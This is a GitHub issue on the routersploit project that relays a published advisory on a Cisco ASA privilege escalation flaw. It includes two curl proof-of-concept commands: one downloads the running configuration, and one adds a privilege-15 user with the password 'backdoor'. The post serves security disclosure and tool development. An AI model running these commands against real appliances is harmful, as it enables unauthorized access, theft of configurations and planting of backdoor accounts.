routersploit icon indicating copy to clipboard operation
routersploit copied to clipboard

Published 20 hours ago verified publisher icon threat9

Cisco ASA Privilege Escalation Flaw

Open peterpt opened this issue 5 years ago • 0 comments

https://www.tenable.com/blog/privilege-escalation-flaw-discovered-in-the-cisco-adaptive-security-appliance

Analysis

When command authorization is not enabled, an authenticated remote unprivileged (level 0 or 1) user can change or download the running configuration as well as upload or replace the appliance firmware. Downgrading appliance firmware to an older version would allow an attacker to leverage known vulnerabilities that have been well researched or have publicly available exploit modules.

A simple proof of concept for downloading the running configuration follows:

curl --basic -u notadmin -p -k http:///admin/system/running-config

The following proof of concept allows an unprivileged user to add a new privileged user to the running configuration:

curl --basic -u notadmin -p -k -X “POST” --data-binary “username fourthuser password backdoor privilege 15” “http:///admin/config”

According to Cisco “This vulnerability affects Cisco ASA Software that is running on any Cisco product that has web management access enabled.”

peterpt avatar Dec 23 '18 21:12 peterpt